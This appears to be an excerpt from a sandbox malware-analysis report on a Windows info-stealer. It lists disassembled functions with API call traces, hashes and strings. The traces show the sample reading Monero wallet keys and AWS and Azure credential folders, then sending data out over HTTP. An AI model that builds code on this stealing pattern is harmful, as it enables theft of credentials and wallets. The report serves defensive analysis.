                  • Opcode ID: 573f487dbc3a709c2761e4b3818a7ca22db38d4bd5633884ce251d451b2c6807
                  • Instruction ID: 8a5d3c8d23b8979e92f232460d89f195ef8a8b9412ab45300a398abb68339292
                  • Opcode Fuzzy Hash: 573f487dbc3a709c2761e4b3818a7ca22db38d4bd5633884ce251d451b2c6807
                  • Instruction Fuzzy Hash: C6D13D72900208ABDB48EBF0DD96EEE737ABF14300F454418F142B7191DF74AA4ADBA5
                  Function 00625960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0063A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0063A7E6
                    • Part of subcall function 006247B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00624839
                    • Part of subcall function 006247B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00624849
                    • Part of subcall function 0063A740: lstrcpy.KERNEL32(00640E17,00000000), ref: 0063A788
                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 006259F8
                  • StrCmpCA.SHLWAPI(?,0131F730), ref: 00625A13
                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00625B93
                  • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0131F720,00000000,?,0131B408,00000000,?,00641A1C), ref: 00625E71
                  • lstrlen.KERNEL32(00000000), ref: 00625E82
                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00625E93
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00625E9A
                  • lstrlen.KERNEL32(00000000), ref: 00625EAF
                  • lstrlen.KERNEL32(00000000), ref: 00625ED8
                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00625EF1
                  • lstrlen.KERNEL32(00000000,?,?), ref: 00625F1B
                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00625F2F
                  • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00625F4C
                  • InternetCloseHandle.WININET(00000000), ref: 00625FB0
                  • InternetCloseHandle.WININET(00000000), ref: 00625FBD
                  • HttpOpenRequestA.WININET(00000000,0131F6E0,?,0131F490,00000000,00000000,00400100,00000000), ref: 00625BF8
                    • Part of subcall function 0063A9B0: lstrlen.KERNEL32(?,01318F10,?,\Monero\wallet.keys,00640E17), ref: 0063A9C5
                    • Part of subcall function 0063A9B0: lstrcpy.KERNEL32(00000000), ref: 0063AA04
                    • Part of subcall function 0063A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0063AA12
                    • Part of subcall function 0063A8A0: lstrcpy.KERNEL32(?,00640E17), ref: 0063A905
                    • Part of subcall function 0063A920: lstrcpy.KERNEL32(00000000,?), ref: 0063A972
                    • Part of subcall function 0063A920: lstrcat.KERNEL32(00000000), ref: 0063A982
                  • InternetCloseHandle.WININET(00000000), ref: 00625FC7
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                  • String ID: "$"$------$------$------
                  • API String ID: 874700897-2180234286
                  • Opcode ID: 97c032fe7e7a5ca01349a81069fb896fd2b8eaf5a03ba2ab9f890eb953d11ad6
                  • Instruction ID: cba2c28a527f95191b0d7e17096edb8fe5aefbe79fea6caa399db719c10bc3aa
                  • Opcode Fuzzy Hash: 97c032fe7e7a5ca01349a81069fb896fd2b8eaf5a03ba2ab9f890eb953d11ad6
                  • Instruction Fuzzy Hash: 4B120E71820118AADB55EBE0DC95FEEB37ABF14700F4141ADF14672091EF702A49DFA9
                  Function 0062CEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0063A740: lstrcpy.KERNEL32(00640E17,00000000), ref: 0063A788
                    • Part of subcall function 0063A9B0: lstrlen.KERNEL32(?,01318F10,?,\Monero\wallet.keys,00640E17), ref: 0063A9C5
                    • Part of subcall function 0063A9B0: lstrcpy.KERNEL32(00000000), ref: 0063AA04
                    • Part of subcall function 0063A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0063AA12
                    • Part of subcall function 0063A8A0: lstrcpy.KERNEL32(?,00640E17), ref: 0063A905
                    • Part of subcall function 00638B60: GetSystemTime.KERNEL32(00640E1A,0131B558,006405AE,?,?,006213F9,?,0000001A,00640E1A,00000000,?,01318F10,?,\Monero\wallet.keys,00640E17), ref: 00638B86
                    • Part of subcall function 0063A920: lstrcpy.KERNEL32(00000000,?), ref: 0063A972
                    • Part of subcall function 0063A920: lstrcat.KERNEL32(00000000), ref: 0063A982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0062CF83
                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0062D0C7
                  • RtlAllocateHeap.NTDLL(00000000), ref: 0062D0CE
                  • lstrcat.KERNEL32(?,00000000), ref: 0062D208
                  • lstrcat.KERNEL32(?,00641478), ref: 0062D217
                  • lstrcat.KERNEL32(?,00000000), ref: 0062D22A
                  • lstrcat.KERNEL32(?,0064147C), ref: 0062D239
                  • lstrcat.KERNEL32(?,00000000), ref: 0062D24C
                  • lstrcat.KERNEL32(?,00641480), ref: 0062D25B
                  • lstrcat.KERNEL32(?,00000000), ref: 0062D26E
                  • lstrcat.KERNEL32(?,00641484), ref: 0062D27D
                  • lstrcat.KERNEL32(?,00000000), ref: 0062D290
                  • lstrcat.KERNEL32(?,00641488), ref: 0062D29F
                  • lstrcat.KERNEL32(?,00000000), ref: 0062D2B2
                  • lstrcat.KERNEL32(?,0064148C), ref: 0062D2C1
                  • lstrcat.KERNEL32(?,00000000), ref: 0062D2D4
                  • lstrcat.KERNEL32(?,00641490), ref: 0062D2E3
                    • Part of subcall function 0063A820: lstrlen.KERNEL32(00624F05,?,?,00624F05,00640DDE), ref: 0063A82B
                    • Part of subcall function 0063A820: lstrcpy.KERNEL32(00640DDE,00000000), ref: 0063A885
                  • lstrlen.KERNEL32(?), ref: 0062D32A
                  • lstrlen.KERNEL32(?), ref: 0062D339
                    • Part of subcall function 0063AA70: StrCmpCA.SHLWAPI(013190E0,0062A7A7,?,0062A7A7,013190E0), ref: 0063AA8F
                  • DeleteFileA.KERNEL32(00000000), ref: 0062D3B4
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                  • String ID:
                  • API String ID: 1956182324-0
                  • Opcode ID: ae024a86908f943250cd5022d4e07aee00b02c0e61fd1605a36e0b36299db938
                  • Instruction ID: e2e7e7971ebd5f2a6bbed1f60bb5f3897f8eece1dcc4dbbab4a1981ddd7ce920
                  • Opcode Fuzzy Hash: ae024a86908f943250cd5022d4e07aee00b02c0e61fd1605a36e0b36299db938
                  • Instruction Fuzzy Hash: 33E13D72910108ABCB48EBE0DD96EEE737ABF14300F114168F147B7191DE75AA05EFA6
                  Function 00624880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0063A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0063A7E6
                    • Part of subcall function 006247B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00624839
                    • Part of subcall function 006247B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00624849
                    • Part of subcall function 0063A740: lstrcpy.KERNEL32(00640E17,00000000), ref: 0063A788
                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00624915
                  • StrCmpCA.SHLWAPI(?,0131F730), ref: 0062493A
                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00624ABA
                  • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00640DDB,00000000,?,?,00000000,?,",00000000,?,0131F8A0), ref: 00624DE8
                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00624E04
                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00624E18
                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00624E49
                  • InternetCloseHandle.WININET(00000000), ref: 00624EAD
                  • InternetCloseHandle.WININET(00000000), ref: 00624EC5
                  • HttpOpenRequestA.WININET(00000000,0131F6E0,?,0131F490,00000000,00000000,00400100,00000000), ref: 00624B15
                    • Part of subcall function 0063A9B0: lstrlen.KERNEL32(?,01318F10,?,\Monero\wallet.keys,00640E17), ref: 0063A9C5
                    • Part of subcall function 0063A9B0: lstrcpy.KERNEL32(00000000), ref: 0063AA04
                    • Part of subcall function 0063A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0063AA12
                    • Part of subcall function 0063A8A0: lstrcpy.KERNEL32(?,00640E17), ref: 0063A905
                    • Part of subcall function 0063A920: lstrcpy.KERNEL32(00000000,?), ref: 0063A972
                    • Part of subcall function 0063A920: lstrcat.KERNEL32(00000000), ref: 0063A982
                  • InternetCloseHandle.WININET(00000000), ref: 00624ECF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                  • String ID: "$"$------$------$------
                  • API String ID: 460715078-2180234286
                  • Opcode ID: 0fb14be02842b304658cebc764a406801f7d2a636bf0412b4cb1d9ee73d22ef2
                  • Instruction ID: b8430d4f96bfbefe899a1ce00ec80864f7f3e11d646c48d5f7b55bbb077e324e
                  • Opcode Fuzzy Hash: 0fb14be02842b304658cebc764a406801f7d2a636bf0412b4cb1d9ee73d22ef2
                  • Instruction Fuzzy Hash: 2A12D672911118AADB59EB90DC92FEEB33AAF14300F51419DB14672091EF702F49DFAA
                  Function 0062C990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0063A740: lstrcpy.KERNEL32(00640E17,00000000), ref: 0063A788
                    • Part of subcall function 0063A920: lstrcpy.KERNEL32(00000000,?), ref: 0063A972
                    • Part of subcall function 0063A920: lstrcat.KERNEL32(00000000), ref: 0063A982
                    • Part of subcall function 0063A8A0: lstrcpy.KERNEL32(?,00640E17), ref: 0063A905
                    • Part of subcall function 0063A9B0: lstrlen.KERNEL32(?,01318F10,?,\Monero\wallet.keys,00640E17), ref: 0063A9C5
                    • Part of subcall function 0063A9B0: lstrcpy.KERNEL32(00000000), ref: 0063AA04
                    • Part of subcall function 0063A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0063AA12
                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0131E568,00000000,?,0064144C,00000000,?,?), ref: 0062CA6C
                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0062CA89
                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0062CA95
                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0062CAA8
                  • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0062CAD9
                  • StrStrA.SHLWAPI(?,0131E5F8,00640B52), ref: 0062CAF7
                  • StrStrA.SHLWAPI(00000000,0131E4F0), ref: 0062CB1E
                  • StrStrA.SHLWAPI(?,0131EBD0,00000000,?,00641458,00000000,?,00000000,00000000,?,01319190,00000000,?,00641454,00000000,?), ref: 0062CCA2
                  • StrStrA.SHLWAPI(00000000,0131EA50), ref: 0062CCB9
                    • Part of subcall function 0062C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0062C871
                    • Part of subcall function 0062C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0062C87C
                  • StrStrA.SHLWAPI(?,0131EA50,00000000,?,0064145C,00000000,?,00000000,013191B0), ref: 0062CD5A
                  • StrStrA.SHLWAPI(00000000,01319000), ref: 0062CD71
                    • Part of subcall function 0062C820: lstrcat.KERNEL32(?,00640B46), ref: 0062C943
                    • Part of subcall function 0062C820: lstrcat.KERNEL32(?,00640B47), ref: 0062C957
                    • Part of subcall function 0062C820: lstrcat.KERNEL32(?,00640B4E), ref: 0062C978
                  • lstrlen.KERNEL32(00000000), ref: 0062CE44
                  • CloseHandle.KERNEL32(00000000), ref: 0062CE9C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                  • String ID:
                  • API String ID: 3744635739-3916222277
                  • Opcode ID: 7a1e719ee738a982bf2a5e6e8a712eb1c1d7243239433ad112d975d55dbe5b70
                  • Instruction ID: 44771cc84709cb734bd766476f873e9497a94e4d7484946953368d11ef34b448
                  • Opcode Fuzzy Hash: 7a1e719ee738a982bf2a5e6e8a712eb1c1d7243239433ad112d975d55dbe5b70
                  • Instruction Fuzzy Hash: 99E1FA71810108ABDB58EBE0DC92FEEB77AAF14300F41415DF14676191EF706A4ADFAA
                  Function 00638320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0063A740: lstrcpy.KERNEL32(00640E17,00000000), ref: 0063A788
                  • RegOpenKeyExA.ADVAPI32(00000000,0131C618,00000000,00020019,00000000,006405B6), ref: 006383A4
                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00638426
                  • wsprintfA.USER32 ref: 00638459
                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0063847B
                  • RegCloseKey.ADVAPI32(00000000), ref: 0063848C
                  • RegCloseKey.ADVAPI32(00000000), ref: 00638499
                    • Part of subcall function 0063A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0063A7E6
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseOpenlstrcpy$Enumwsprintf
                  • String ID: - $%s\%s$?
                  • API String ID: 3246050789-3278919252
                  • Opcode ID: 339b3db7b9e0ddf2aa9970604a172dcb65310dbd8b191021cd58a2ef97e62e7c
                  • Instruction ID: 4830a3a29a216dd60b9d1f826dd1ab7582f842c7e4abcc9886d981a776fea40c
                  • Opcode Fuzzy Hash: 339b3db7b9e0ddf2aa9970604a172dcb65310dbd8b191021cd58a2ef97e62e7c
                  • Instruction Fuzzy Hash: 62811D71911218ABEB68DB50CC95FEA77B9FF48700F008298F149A6180DF716B85CFD5
                  Function 00634D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00638DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00638E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 00634DB0
                  • lstrcat.KERNEL32(?,\.azure\), ref: 00634DCD
                    • Part of subcall function 00634910: wsprintfA.USER32 ref: 0063492C
                    • Part of subcall function 00634910: FindFirstFileA.KERNEL32(?,?), ref: 00634943
                  • lstrcat.KERNEL32(?,00000000), ref: 00634E3C
                  • lstrcat.KERNEL32(?,\.aws\), ref: 00634E59
                    • Part of subcall function 00634910: StrCmpCA.SHLWAPI(?,00640FDC), ref: 00634971
                    • Part of subcall function 00634910: StrCmpCA.SHLWAPI(?,00640FE0), ref: 00634987
                    • Part of subcall function 00634910: FindNextFileA.KERNEL32(000000FF,?), ref: 00634B7D
                    • Part of subcall function 00634910: FindClose.KERNEL32(000000FF), ref: 00634B92
                  • lstrcat.KERNEL32(?,00000000), ref: 00634EC8
                  • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00634EE5
                    • Part of subcall function 00634910: wsprintfA.USER32 ref: 006349B0
                    • Part of subcall function 00634910: StrCmpCA.SHLWAPI(?,006408D2), ref: 006349C5
                    • Part of subcall function 00634910: wsprintfA.USER32 ref: 006349E2
                    • Part of subcall function 00634910: PathMatchSpecA.SHLWAPI(?,?), ref: 00634A1E
                    • Part of subcall function 00634910: lstrcat.KERNEL32(?,0131F7E0), ref: 00634A4A
                    • Part of subcall function 00634910: lstrcat.KERNEL32(?,00640FF8), ref: 00634A5C
                    • Part of subcall function 00634910: lstrcat.KERNEL32(?,?), ref: 00634A70
                    • Part of subcall function 00634910: lstrcat.KERNEL32(?,00640FFC), ref: 00634A82
                    • Part of subcall function 00634910: lstrcat.KERNEL32(?,?), ref: 00634A96
                    • Part of subcall function 00634910: CopyFileA.KERNEL32(?,?,00000001), ref: 00634AAC
                    • Part of subcall function 00634910: DeleteFileA.KERNEL32(?), ref: 00634B31
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                  • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                  • API String ID: 949356159-974132213
                  • Opcode ID: ced422b53be877b10cba3cd47b0ff9c0023116e2cd427fb08e5e6b37ab61a9cb
                  • Instruction ID: db950c19b709da4063da643b8015f7a9f0ddcf0f708c7ae1195289c4d3d92858
                  • Opcode Fuzzy Hash: ced422b53be877b10cba3cd47b0ff9c0023116e2cd427fb08e5e6b37ab61a9cb
                  • Instruction Fuzzy Hash: 4341D4BA94020867CB54F770EC47FED7339AB25700F014498B689660C1EEB5ABC9CBD2
                  Function 00639010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                  Download Yara Rule
                  APIs
                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0063906C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
